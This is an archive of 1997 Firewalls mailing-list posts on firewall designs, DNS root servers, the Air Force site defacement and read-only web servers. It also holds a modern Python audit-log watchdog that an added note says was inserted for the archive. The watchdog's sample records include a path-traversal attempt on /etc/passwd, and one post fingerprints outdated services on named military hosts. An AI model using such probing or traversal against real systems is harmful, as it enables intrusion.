From firewalls-owner Thu Jan 2 08:23:19 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA04598 for firewalls-outgoing; Thu, 2 Jan 1997 08:04:48 -0800 (PST) Received: from gateway.segue.com (gateway.segue.com [192.12.233.12]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA04587 for ; Thu, 2 Jan 1997 08:04:36 -0800 (PST) Received: (from news@localhost) by gateway.segue.com (8.7.1/8.7.1) id LAA29918 for ; Thu, 2 Jan 1997 11:04:06 -0500 (EST) X-Authentication-Warning: gateway.segue.com: news set sender to using -f Received: from segue1.segue.com(192.12.23.1) by gateway.segue.com via smap (V1.3) id sma029914; Thu Jan 2 11:03:50 1997 Received: from [192.12.23.174] (natick.segue.com [192.12.23.174]) by segue1.segue.com (8.7.1/8.7.1) with SMTP id LAA12392 for ; Thu, 2 Jan 1997 11:03:49 -0500 (EST) Message-Id: <199701021603.LAA12392@segue1.segue.com> To: "Firewalls@GreatCircle.COM" Subject: Making a case for Firewall design Date: Thu, 02 Jan 97 10:59:58 -0500 From: Rich Lenihan X-Mailer: E-Mail Connection v2.5.03 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I'm trying to make a case for a firewall design. I've narrowed the choices down to two options.
Option A looks like:

 internal    internal      dual-homed            external
 network --- filtering --- bastion host with --- filtering --- internet
             router        TIS toolkit           router

option B looks like:

 internal    internal   bastion host(s)     external
 network --- "firewall"        |            filtering --- internet
             system* ---- DMZ network ---- router

*(Cisco PIX or similar device)

With both options, we would need to proxy or masquerade all internal connections to the internet (we use private IP addresses). I'm pretty sure both options would give us what we want (internet connectivity + security).

The trade-offs I see are the lower cost of A (most of the pieces are already in place) vs. the ease of use and extensibility of B. My own preference is for option B but I'll need some backup before I can make a case for spending $10K+.

Has anyone else made or seen such a (third-party) analysis before? I have the O'Reilly Firewalls book but they don't really cover option B.

Thanks...

-Rich
--
Rich Lenihan System/Network Administrator rich@segue.com 617.796.1247 (voice) 617.796.1610 (fax) Segue Software, Inc.
1320 Centre Street Newton Centre, MA 02159 USA

From firewalls-owner Thu Jan 2 09:31:42 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA08163 for firewalls-outgoing; Thu, 2 Jan 1997 08:48:18 -0800 (PST) Received: from simtel.Coast.NET (simtel.coast.net [205.149.128.6]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA08108 for ; Thu, 2 Jan 1997 08:47:51 -0800 (PST) Received: by simtel.Coast.NET (Smail3.1.28.1 #12) id m0vfqI5-0000vmC; Thu, 2 Jan 97 11:46 EST Date: Thu, 2 Jan 1997 11:46:48 -0500 (EST) To: long-morrow@CS.YALE.EDU Cc: Firewalls@GreatCircle.COM, zeb@sbbs.se Subject: Re: Air Force Web Site Hacked In-Reply-To: <199701021533.KAA11384@SPARKY.CF.CS.YALE.EDU> from "long-morrow@CS.YALE.EDU" at Jan 2, 97 10:33:39 am From: "Mike O'Connor" Reply-To: "Mike O'Connor" X-Organization: :noitazinagrO-X Message-Id: <970102114649.mjo@dojo> Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

:>I'm getting unnerved by the fact that not only
:>have those sites indeed been hacked, but no one
:>seems to be surprised.
:>
:>What techniques were used? To alter the html
:>files, someone obviously managed to achieve
:>file overwrite rights (at the very least).
:
:You'd be surprised at how many NCSA httpd sites are
:still out there which are vulnerable to the attack:

[more about the phf bug]

There's no reason to believe that the compromise to www.af.mil occurred through any weakness in the WWW server software/machine in particular. I just did some cursory checking -- "server.af.mil" is running sendmail 5.59(!) and "ddn.af.mil" is running NFS (no exports list, perhaps a default portmap though). And it could always be an inside job...

...Mike
--
Michael J. O'Connor mjo@dojo.mi.org "...and life begins at 40 -- so they promise" -John Lennon

From firewalls-owner Thu Jan 2 09:35:10 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA08848 for firewalls-outgoing; Thu, 2 Jan 1997 08:55:29 -0800 (PST) Received: from honcho.columbiasc.ncr.com ([153.78.17.231]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA08796 for ; Thu, 2 Jan 1997 08:55:13 -0800 (PST) Received: from exchsmtp.ColumbiaSC.NCR.COM (exchsmtp.ColumbiaSC.NCR.COM [153.78.122.72]) by honcho.columbiasc.ncr.com (8.6.12/8.6.12) with SMTP id LAA09391 for ; Thu, 2 Jan 1997 11:54:38 -0500 Received: by exchsmtp.ColumbiaSC.NCR.COM with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBF8A3.BA2F4B80@exchsmtp.ColumbiaSC.NCR.COM>; Thu, 2 Jan 1997 11:54:36 -0500 Message-ID: From: "Caldwell, Matt COLASC" To: "firewalls@GreatCircle.COM" , "owl@owlsnest.com" Subject: RE: Is Your Website a Secret? Date: Thu, 2 Jan 1997 11:52:00 -0500 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

----------
From: owl@owlsnest.com To: firewalls@GreatCircle.COM Subject: Is Your Website a Secret? Date: Tuesday, December 31, 1996 9:22PM

Is your web site the best kept secret on the Internet? We'll promote it to 50 search engines and indexes for $85 and complete the job in 2 business days. Satisfaction is guaranteed!

SPAM DELETED

Matt Caldwell - Security / Unix Administrator
---------------------------------------------
NCR / Mosaic Computing Inc.
matt.caldwell@columbiasc.ncr.com matt.caldwell@mosaic-comp.com Office: 803-939-2322
---------------------------------------------

From firewalls-owner Thu Jan 2 09:44:07 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA11297 for firewalls-outgoing; Thu, 2 Jan 1997 09:27:06 -0800 (PST) Received: from Walden.MO.NET (walden.mo.net [199.250.196.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id JAA11290 for ; Thu, 2 Jan 1997 09:26:58 -0800 (PST) Received: from gate.hussmann.com (gate.hussmann.com [205.139.246.2]) by Walden.MO.NET (8.8.3/8.6.10) with ESMTP id LAA15652 for ; Thu, 2 Jan 1997 11:31:34 -0600 (CST) Received: (from nobody@localhost) by gate.hussmann.com (8.7.1/8.7.3) id LAA13244 for ; Thu, 2 Jan 1997 11:25:30 -0600 Message-Id: <199701021725.LAA13244@gate.hussmann.com> Received: from mail-gate.hussmann.com(129.1.5.4) by gate.hussmann.com via smap (V1.3) id tmp013242; Thu Jan 2 11:25:29 1997 Date: Thu, 2 Jan 1997 11:25:00 -0600 From: "Hicks, Rick" Subject: RE: DNS Proxy and Internal Root Name Ser To: "'Firewalls List'" X-Mailer: Worldtalk (NetConnex V4.00a)/MIME Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>>Problem:
>>One problem I thought of concerns the mitigation between the internal
>>root name server and the forwarders/slave lines. If a subordinate
>>domain name server queries the root name server for an "outside" domain,
>>how would it know to forward the query to the proxy (being that it is an
>>internal root name server)? I could have my subordinate top-level
>>domain name servers query the proxy directly by putting a forwarders line
>>in its /etc/named.boot, however, this would bypass the internal root
>>structure. It seems to be straightforward w/o an internal root name
>>server, however, I need to maintain these root name servers. Can anyone
>>help?
>The problem with an internal root server is that it won't take any account
>of your forwarders & slave options because it is said to be a root server.
>The only solution I think of is adding the noforward patch in the named
>daemons of the first level name servers you have under your root server.
>You just have to specify all the domains known by your internal root
>nameserver
>so that your lower level nameserver would query it but would forward to your
>proxy for everything else.

The solution to both of these issues is to have a host running as your internal *root* nameserver, and NOTHING else. The root only needs to have references to hosts that are authoritative for the domain(s); they do not need to be, or should be, nameservers for a domain. This way your internal servers will believe that they are authoritative for the domain, but still forward unresolvable queries to the *forwarders* host. The forwarders host should be the *firewall* running as a primary, secondary, or caching server (if your upstream provider is authoritative for your zone) with a true root.db to resolve external hosts.

This works quite well, as I have been doing it for almost a year without problems.
Rick
________________________________________________
Rick Hicks Systems Specialist Hussmann Corporation rhicks@hussmann.com http://www.hussmann.com

From firewalls-owner Thu Jan 2 10:38:19 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA14933 for firewalls-outgoing; Thu, 2 Jan 1997 10:08:47 -0800 (PST) Received: from seeker.hermesnet.net (seeker.hermesnet.net [205.177.6.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA14924 for ; Thu, 2 Jan 1997 10:08:39 -0800 (PST) Received: from owl-ppp.hermesnet.net (mortar.dsava.com [192.234.181.161]) by seeker.hermesnet.net (8.8.4/8.8.4) with SMTP id NAA12891; Thu, 2 Jan 1997 13:05:52 -0500 (EST) Message-Id: <199701021805.NAA12891@seeker.hermesnet.net> X-MAPI-MessageClass: IPM To: rich@segue.com Cc: firewalls@greatcircle.com X-Mailer: FTP Software Internet Mail 2.0 MIME-Version: 1.0 From: Don Flint Subject: RE: Making a case for Firewall design Date: Thu, 02 Jan 1997 13:04:21 -0500 Content-Type: text/plain; charset=US-ASCII; X-MAPIextension=".TXT" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>>Reply to your message of 1/2/97 12:42 PM
>>
>>I'm trying to make a case for a firewall design. I've narrowed the choices
>>down to two options. Option A looks like:
>>
>> internal    internal      dual-homed            external
>> network --- filtering --- bastion host with --- filtering --- internet
>>             router        TIS toolkit           router
>>
>>option B looks like:
>>
>> internal    internal   bastion host(s)     external
>> network --- "firewall"        |            filtering --- internet
>>             system* ---- DMZ network ---- router
>>
>>*(Cisco PIX or similar device)
>>
>>With both options, we would need to proxy or masquerade all internal
>>connections to the internet (we use private IP addresses). I'm pretty sure
>>both options would give us what we want (internet connectivity + security).
>>The trade-offs I see are the lower cost of A (most of the pieces are already
>>in place) vs. the ease of use and extensibility of B. My own preference is
>>for option B but I'll need some backup before I can make a case for spending
>>$10K+.
>>
>>Has anyone else made or seen such a (third-party) analysis before? I have
>>the O'Reilly Firewalls book but they don't really cover option B.

Rich:

Have you thought about some of the other commercial products rather than just the TIS toolkit or the router/DMZ approach? There are several very good ones produced for a variety of platforms. Price has always been an objection, but now many of them are available for the same cost as the range you mentioned for the router/DMZ. They offer improved security over the router/DMZ approach as well.

Whatever route you decide to go, best of luck.

Don Flint

From firewalls-owner Thu Jan 2 10:38:32 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA15398 for firewalls-outgoing; Thu, 2 Jan 1997 10:14:50 -0800 (PST) Received: from cohiba.predictive.com (cohiba.predictive.com [204.243.240.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA15379 for ; Thu, 2 Jan 1997 10:14:37 -0800 (PST) Received: (from rachel@localhost) by cohiba.predictive.com (8.7.6/8.7.3) id NAA15030 for Firewalls@GreatCircle.COM; Thu, 2 Jan 1997 13:14:28 -0500 From: Rachel Rosencrantz Message-Id: <199701021814.NAA15030@cohiba.predictive.com> Subject: read only disks To: Firewalls@GreatCircle.COM Date: Thu, 2 Jan 1997 13:14:28 -0500 (EST) In-Reply-To: <199701020900.BAA15175@miles.greatcircle.com> from "Firewalls-Digest" at Jan 2, 97 01:00:28 am Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Firewalls-Digest said:
> From: "Jason T. Luttgens"
> Subject: RE: Air Force Web Site Hacked
>
> I do think read-only media is an interesting idea, by the way :) Dale is
> right though, there are still vulnerabilities.
> Personally, I like the idea
> of marking the files immutable myself. This way, even root can't change the
> content unless the machine is brought down into single-user mode. Not sure
> how many other operating systems support this other than (the great) BSDI
> though.
>

I think that pretty much all OS's should have the Read only option on mounting file systems. CD roms usually like you to mount them read only. However, if one can break into root the disk could be unmounted and mounted without shutting down. If the system was also taking in data (such as forms input, and of course the access logs) one could put that data on a read write file system. This does not remove the underlying problem that these break ins point to, but it might make it slightly harder to make it publicly visible that someone was caught with their proverbial pants down.

Now the ideal thing from the read only perspective (if you thought this was a way to go) would be if there was some device that was only writable in a special machine (like a cd-rom) but could be rewritten (like a disk) by that machine. Then you could have the read only information mounted from the device that can only read it, and when the web master wanted to modify it they could unmount it, pop it in the modification machine, and make the changes, and re-mount it (actually you'd probably want 2 copies of the "disk". One would be in the mod machine (not on the net) and could make it easy to sit down and make the changes, and once they are finished the disks could be swapped (the second one updated) and there would be a minimum of web page down time. My understanding of CD's is that they wouldn't work this way since the data is more "etched" in the disk somewhat like a record.
-Rachel

From firewalls-owner Thu Jan 2 11:29:03 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA17753 for firewalls-outgoing; Thu, 2 Jan 1997 10:37:41 -0800 (PST) Received: from honcho.columbiasc.ncr.com ([153.78.17.231]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id KAA17681 for ; Thu, 2 Jan 1997 10:37:20 -0800 (PST) Received: from exchsmtp.ColumbiaSC.NCR.COM (exchsmtp.ColumbiaSC.NCR.COM [153.78.122.72]) by honcho.columbiasc.ncr.com (8.6.12/8.6.12) with SMTP id NAA23587 for ; Thu, 2 Jan 1997 13:36:18 -0500 Received: by exchsmtp.ColumbiaSC.NCR.COM with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBF8B1.EE6C10A0@exchsmtp.ColumbiaSC.NCR.COM>; Thu, 2 Jan 1997 13:36:17 -0500 Message-ID: From: "Caldwell, Matt COLASC" To: Jim Truitt , Paul Ferguson Cc: "firewalls@GreatCircle.COM" Subject: Security Administrators: Web of Trust Date: Thu, 2 Jan 1997 13:35:00 -0500 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

----------
From: Jim Truitt To: Paul Ferguson Cc: firewalls@GreatCircle.COM Subject: Re: Denial of service (was Re: Air Force Web Site Hacked) Date: Wednesday, January 01, 1997 3:32PM

[snip]
>So, what can you do? Log, log, log. And more logging. And get
>to know the security administrator upstream from you.
>
>- paul
[snip]

This is simple, but excellent advice. Users of PGP are always talking about a "web of trust". Perhaps what is needed is a web of trust between security Maybe what we need is our own group that promotes trust between each other and lets us get together as professionals. or a web site etc.. admins. Just a thought.
Jim Truitt

From firewalls-owner Thu Jan 2 11:30:03 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA21291 for firewalls-outgoing; Thu, 2 Jan 1997 11:20:52 -0800 (PST) Received: from Walden.MO.NET (walden.mo.net [199.250.196.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA21256 for ; Thu, 2 Jan 1997 11:20:35 -0800 (PST) Received: from gate.hussmann.com (gate.hussmann.com [205.139.246.2]) by Walden.MO.NET (8.8.3/8.6.10) with ESMTP id NAA05692; Thu, 2 Jan 1997 13:25:07 -0600 (CST) Received: (from nobody@localhost) by gate.hussmann.com (8.7.1/8.7.3) id NAA13922; Thu, 2 Jan 1997 13:19:02 -0600 Message-Id: <199701021919.NAA13922@gate.hussmann.com> Received: from mail-gate.hussmann.com(129.1.5.4) by gate.hussmann.com via smap (V1.3) id tmp013915; Thu Jan 2 13:18:52 1997 Date: Thu, 2 Jan 1997 13:19:00 -0600 From: "Hicks, Rick" Subject: RE: DNS Proxy and Internal Root Name Ser To: Jean-Francois ZWOBADA , "'Firewalls List'" X-Mailer: Worldtalk (NetConnex V4.00a)/MIME Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>Sorry... That's probably due to my poor English but I must confess I missed
>something in your explanation... "The root only needs to
>>have references to hosts that are authoritative for the domain(s), they
>>do not need to be, or should be, nameservers for a domain."
>What do you mean exactly ?

I guess I should explain the assumptions I made. I assumed that you have internal nameservers for your domain that are not listed as authoritative with InterNIC. I also assumed that you have already set up an internal *root* nameserver situation that will spoof the internal servers into believing that they are authoritative for the domain even though they cannot, or you don't want them to, communicate with true Internet root nameservers. What I have just explained is what I and many other people have set up.
The difference I saw was this: You are using your internal *root* nameserver to resolve queries. The internal *root* should not have host data in it and should not be used to resolve names. It should run with references to the internal nameservers and be listed in these internal nameservers' root.db (or root.cache) file. No client should be using it for name resolving; they should use the other nameservers that you have set up as primary and secondaries.

If my assumptions are incorrect let me know. Also, it may be that you have confused the terms 'root' and 'primary' when it comes to nameservers. Please check to see that this is not the case.

Rick
________________________________________________
Rick Hicks Systems Specialist Hussmann Corporation rhicks@hussmann.com http://www.hussmann.com

From firewalls-owner Thu Jan 2 11:33:24 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA19024 for firewalls-outgoing; Thu, 2 Jan 1997 10:48:24 -0800 (PST) Received: from manukau.govt.nz ([202.14.82.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA19006 for ; Thu, 2 Jan 1997 10:48:12 -0800 (PST) Received: by kotuku.manukau.govt.nz id <35721>; Fri, 3 Jan 1997 07:59:07 +1300 Message-Id: <97Jan3.075907nzdt.35721@kotuku.manukau.govt.nz> From: Matthew Thompson To: "'Brian Stone'" Cc: "firewalls@GreatCircle.COM" Subject: RE: Air Force Web Site Hacked -Reply Date: Sat, 4 Jan 1997 09:42:42 +1300 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

The standard's called El Torito, bootable CD-ROM, it requires PC BIOS support, many newer PCs support this, and you can add an Adaptec card and SCSI CD-ROM to an older PC for this support. Windows NT4 is probably the most common example of a PC bootable CD-ROM available today.

NT and Unix can be placed in ROM, but I'd suspect most implementations create a ramdisk for temporary use, and it still does not stop someone modifying programs in RAM (buffer overruns etc).
However facing an almost totally read only machine, running nothing but a webserver would probably make many crackers go away and look for a softer target. You could also automate monitoring of the audit log, and murder any processes which start writing, or attempting to write in areas they shouldn't (including the RO file systems) and/or initiate a system shutdown or restart in this instance. Most people I'm sure would rather have a webserver off the air, than full of kiddy porn...

>Compaq Corp. provides a bootable "Smart Start" OS installation CD with
>every Proliant 5000 (many people are using these as
>Netware/IntranetWare or NT file/print/app/web servers). I'm not sure
>how they do it, I believe it's a function of the BIOS that "knows" about the
>CD as a bootable media (probably searches A:, C:, D: etc. for boot files) if
>nothing is in A: and the hard disk isn't partitioned/formatted yet it boots
>from the CD and steps you through installing the rest of the drivers (hard
>drive/NIC/etc.) and the OS you purchased! It's cool and I think they've
>been doing it for awhile.
>Brian Stone
>bstone@KnowledgeSoft.com

>>>> Gene Lee 12/31/96 04:00pm >>>
>On Tuesday, December 31, 1996 2:41 PM, Mark
>Johnson[SMTP:mark@hercules.reno.nv.us] wrote:
>>I have not set one up yet(Planned for July), but I believe you can have
>>a totally CDROM machine, at least using Novell or NT. Bootable CDROMs
>>and all data on CDROM so you would not have any writable media.
>>
>>Can anyone confirm or deny my thoughts?

>Slackware Linux has a useable filesystem on CD-ROM, however the boot
>partition still has to be HD or Floppy. One thing that puzzles me about
>bootable media is if you have a bootable CD, how does it install the
>drivers for itself to read from the CD to actually start reading the boot
>sector (which supposedly is on the CD). Kind of a Catch-22. Forgive me,
>but
>I'm no PC guru...
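The audit-log watchdog Matthew sketches above (kill any process that writes, or tries to write, outside the few places a web server legitimately needs, and escalate to a shutdown when the read-only media is tampered with) is simple enough to show in code. The Python below is an added example written for this archive; it is not code posted by anyone in the thread. The audit-record layout (`pid=... op=... path=... result=...`), the policy prefixes, and the sample records are constructed assumptions, as is the choice to treat a mount or remount (Rachel's "root just remounts the disk" case) as grounds for shutdown rather than a mere kill.

```python
"""Audit-log watchdog for a read-only web server (constructed example).

Flags processes that write outside the writable set and escalates to a
shutdown verdict when someone changes the mount table.  Record format and
policy are assumptions for this example, not a real audit subsystem's.
"""
import posixpath
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# Assumed policy: whole tree read-only except what the web server must write.
READ_ONLY = ("/",)
WRITABLE = ("/var/log/httpd", "/var/run/httpd", "/tmp")

# Operations that modify files, and operations that change the mount table.
WRITE_OPS = {"write", "creat", "unlink", "rename", "chmod", "chown",
             "truncate", "symlink", "mkdir", "rmdir"}
MOUNT_OPS = {"mount", "umount", "remount"}

# Assumed record layout: "<ts> pid=N uid=N comm=NAME op=OP path=PATH result=R"
_RECORD = re.compile(
    r"^(?P<ts>\S+)\s+pid=(?P<pid>\d+)\s+uid=(?P<uid>\d+)\s+comm=(?P<comm>\S+)"
    r"\s+op=(?P<op>\S+)\s+path=(?P<path>\S+)\s+result=(?P<result>\S+)$"
)


@dataclass(frozen=True)
class AuditRecord:
    ts: str
    pid: int
    uid: int
    comm: str
    op: str
    path: str
    result: str


def parse_record(line: str) -> Optional[AuditRecord]:
    """Parse one audit line; return None for lines that are not records."""
    m = _RECORD.match(line.strip())
    if m is None:
        return None
    d = m.groupdict()
    return AuditRecord(d["ts"], int(d["pid"]), int(d["uid"]), d["comm"],
                       d["op"], d["path"], d["result"])


def _under(path: str, prefix: str) -> bool:
    """True if path is prefix itself or lies below it."""
    return path == prefix or path.startswith(prefix.rstrip("/") + "/")


def is_writable_path(path: str) -> bool:
    """Decide by the most specific matching prefix; normpath collapses '..'
    so a path that walks out of a writable directory is judged by where it
    really lands, not by the directory it started in."""
    clean = posixpath.normpath(path)
    best_len, writable = -1, False
    for prefix, allowed in [(p, False) for p in READ_ONLY] + [(p, True) for p in WRITABLE]:
        if _under(clean, prefix) and len(prefix) > best_len:
            best_len, writable = len(prefix), allowed
    return writable


def classify(rec: AuditRecord) -> str:
    """Return 'allow', 'kill' or 'shutdown' for one record."""
    if rec.op in MOUNT_OPS:
        return "shutdown"   # touching the mount table means root-level tampering
    if rec.op in WRITE_OPS and not is_writable_path(rec.path):
        return "kill"       # a refused (EROFS) attempt is as telling as a success
    return "allow"


def watch(lines: Iterable[str]) -> Dict[str, object]:
    """Run the policy over audit lines; report pids to kill and whether to shut down."""
    kill: List[int] = []
    shutdown = False
    reasons: List[str] = []
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        verdict = classify(rec)
        if verdict == "allow":
            continue
        reasons.append(f"{verdict}: {rec.ts} pid={rec.pid} {rec.comm} {rec.op} {rec.path} ({rec.result})")
        if verdict == "kill" and rec.pid not in kill:
            kill.append(rec.pid)
        elif verdict == "shutdown":
            shutdown = True
    return {"kill": kill, "shutdown": shutdown, "reasons": reasons}


# Constructed sample: normal serving, a shell writing into the document tree,
# a '..' walk out of the log directory, and a root remount of the RO media.
SAMPLE_AUDIT = """\
1997-01-02T12:41:29 pid=2143 uid=60001 comm=httpd op=write path=/var/log/httpd/access_log result=OK
1997-01-02T12:41:30 pid=2143 uid=60001 comm=httpd op=read path=/htdocs/index.html result=OK
1997-01-02T12:41:31 pid=2177 uid=60001 comm=sh op=write path=/htdocs/index.html result=EROFS
1997-01-02T12:41:32 pid=2177 uid=60001 comm=sh op=unlink path=/var/log/httpd/../../../etc/passwd result=EROFS
1997-01-02T12:41:40 pid=2190 uid=0 comm=mount op=remount path=/htdocs result=OK
this line is not an audit record
"""

if __name__ == "__main__":
    report = watch(SAMPLE_AUDIT.splitlines())
    for reason in report["reasons"]:
        print(reason)
    print("kill:", report["kill"], "shutdown:", report["shutdown"])
```

Path checks use the longest matching prefix after normalization, so a write to `/var/log/httpd/../../../etc/passwd` is judged as `/etc/passwd` and refused even though it starts inside the writable log directory. The example only reports verdicts; a deployment would act on them with a signal to the offending pid and an orderly shutdown, and would read the real audit trail rather than the constructed records shown here.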
From firewalls-owner Thu Jan 2 12:04:22 1997
From: mcnabb@argus.cu-online.com (Paul McNabb)
To: Firewalls@GreatCircle.COM
Subject: Read-only Web Site (was AF hack)
Date: Thu, 2 Jan 1997 12:41:29 -0600

There has been some discussion of putting a web site on read-only media to protect it against attack, with the drawback being that updating the web site becomes tedious. Three solutions have been proposed: 1) using the immutable bit (for BSD only), 2) using CDROM, and 3) using READ-ONLY file systems.

There is another solution that is being used by some sites, namely using mandatory access control (MAC) security. Here's what we have done for customers:

The web server has two network connections, but has IP forwarding disabled. Processes coming in from one network see all file systems as read-only (making /tmp RO is an option), and there is no mechanism for bypassing that, even if the process is root. All device special files are completely inaccessible to all processes and all users -- also mknod(2) is disabled. If a user comes in from the other network, he/she can access the system normally, except that UID 0 (root) is treated as a normal account in terms of OS privilege, so attacks from this direction are also more tightly controlled (special programs are provided to manage the system instead of using a special account such as root).

                        +------------+
    <-------------->    |  Secured   |    <-------------->
    internal network    |  Web Site  |    Internet/PublicNet
    (RW file systems)   +------------+    (RO file systems)

When a Solaris host (x86 or SPARC) has been updated with this level of security, you can still use the r* commands, telnet, ftp, and even NFS from either side. You can have the RO restriction be done on a per-file basis as well, so you can be creative about your setup.

BTW, I've seen a number of heated messages about the usefulness of Orange Book security in relation to the "real world". The above is an example of Orange Book security available on a late-release OS (Solaris 2.4 and Solaris 2.5.1), evaluated to B1 and C2 (the C2 is quite enhanced from the minimum requirements mentioned in the TCSEC), with Solaris 2.6 planned for summer (it should finish its evaluation by the end of the year as well). There IS a lot of Orange Book trash on the market -- stuff that is old, hard to use, and of questionable usefulness in the real world. But it IS possible to build state-of-the-art, flexible, feature-rich, affordable, evaluated systems. Other companies have also built trusted systems, and users of those systems can comment on their experiences. The old IBM/TIS Trusted Xenix is a very bad example of a trusted system. It reflects the state of technology in the late 1980's, not a modern system.

I agree that if a box is a pure firewall, with no services of any kind being offered, then the addition of B-level security is of minor (but not zero) importance. The instant the firewall system is accessible directly, for example as a web site or for admin purposes, B-level security can be extremely powerful.

paul
------------------------------------------------------------
Paul McNabb                       Argus Systems Group, Inc.
Vice President and CTO            1405A East Florida Avenue
mcnabb@argus.cu-online.com        Urbana, IL 61801 USA
TEL 217-384-6300                  FAX 217-384-6404
"Securing the Future"
------------------------------------------------------------

From firewalls-owner Thu Jan 2 12:06:41 1997
From: Jean-Francois ZWOBADA
To: firewalls@greatcircle.com
Subject: RE: DNS Proxy and Internal Root Name Ser
Date: Thu, 02 Jan 1997 20:53:12 +0100

At 13:19 02/01/1997 -0600, you wrote:
> I guess I should explain the assumptions I made. I assumed that you have
> internal nameservers for your domain that are not listed as
> authoritative with InterNIC.
> I also assumed that you have already set up
> an internal *root* nameserver situation that will spoof the internal
> servers into believing that they are authoritative for the domain even
> though they cannot, or you don't want them to, communicate with true
> Internet root nameservers. What I have just explained is what I and many
> other people have set up.
>
> The difference I saw was this: You are using your internal *root*
> nameserver to resolve queries. The internal *root* should not have host
> data in it and should not be used to resolve names. It should run with
> references to the internal nameservers and be listed in these internal
> nameservers' root.db (or root.cache) file. No client should be using it
> for name resolving; they should use the other nameservers that you have
> set up as primary and secondaries.
>
> If my assumptions are incorrect let me know.
>
> Also, it may be that you have confused the terms 'root' and 'primary'
> when it comes to nameservers. Please check to see that this is not the
> case.
>
> Rick

Well, let me explain my solution:

I assumed that the root name server was needed for linking different internal domains. I have an internal root nameserver and internal nameservers. These servers have a db.cache pointing to the internal root nameserver, and clients send queries to these servers. These nameservers need to ask the root for other internal domains, but they also need to resolve Internet names. I don't want my internal root server to forward these queries to the outside, 'cause it can't, since it's a root server (I mean that it ignores a forwarders & slave configuration). So my nameservers need to ask someone else for Internet names: my firewall. To let them decide between asking the internal root or the firewall, I need to add something, since a 'forwarders' line overrides everything (a father name server, a child, ...). That's why I use the patch.

I was really confused by your explanation and I am still quite confused... :o)
I don't see why your solution solves the problem... Don't get angry, please :o)

Thank you very much

Jean-Francois

From firewalls-owner Thu Jan 2 12:08:45 1997
From: "Jamie Thain"
Subject: NT NAT
Date: Thu, 2 Jan 1997 15:30:38 -0400

To All,

There is now an NT NAT. http://www.on.com.
regards: jamie

From firewalls-owner Thu Jan 2 12:43:58 1997
From: owner-fw-1-mailinglist@us.checkpoint.com
To: firewalls@GreatCircle.COM
Newsgroups: mail.firewalls
Subject: None
Date: 2 Jan 1997 12:22:23 -0800

From: MBARASCH@navl.com (Mike Barasch)
To: FW-1-MAILINGLIST@us.checkpoint.com
Date: 02 Jan 97 13:41:00 EST
Subject: License #

I have Win NT 4.0 with Checkpoint 2.1c with a 250 user license. Every time I restart my firewall I receive a message in the Event Viewer on NT that says "FW1: FW-1 only 256 internal hosts allowed". My firewall seems to be working fine; does this message indicate that I have more than 256 IP hosts on the network? How can I tell how many IP addresses the firewall can detect? Thanks!

Mike Barasch
North American Van Lines

From firewalls-owner Thu Jan 2 13:57:16 1997
From: "McMahan, Peg"
To: "'Jim Truitt'", "'Paul Ferguson'", "'Caldwell, Matt COLASC'"
Cc: "'firewalls@GreatCircle.COM'"
Subject: RE: Security Administrators: Web of Trust
Date: Thu, 2 Jan 1997 15:55:01 -0500

> ----------
> From: Caldwell, Matt COLASC[SMTP:caldwm@msgate.ColumbiaSC.NCR.COM]
> Sent: Thursday, January 02, 1997 1:35 PM
> To: Jim Truitt; Paul Ferguson
> Cc: firewalls@GreatCircle.COM
> Subject: Security Administrators: Web of Trust
>
> [snip]
> > So, what can you do? Log, log, log. And more logging. And get
> > to know the security administrator upstream from you.
> >
> > - paul
> [snip]
>
> This is simple, but excellent advice. Users of PGP are always talking
> about a "web of trust". Perhaps what is needed is a web of trust between
> security
>
> Maybe what we need is our own group that promotes trust between each
> other and lets us get together as professionals. Or a web site etc..

This seems rather unlikely to me... I'm an admin, have been an admin for quite some time, and while I do get to know and trust people, I would NOT trust my systems to anyone else, nor put my trust in anyone's systems... Just because you trust someone doesn't mean they're NOT a dumbass. Trust is (to me anyway) a very very bad word when it comes to security issues. Promoting trust is one thing, but personally I think it's best to be as paranoid as possible, as often as possible. Getting together and trusting each other can only go so far. I can see getting to know the people upstream from you, but that doesn't mean that someone else on that site isn't on the shifty side of things... Paranoia seems like the best option to me.

> admins. Just a thought.
>
> Jim Truitt

peg@v-one.com
www.v-one.com
Systems Engineer
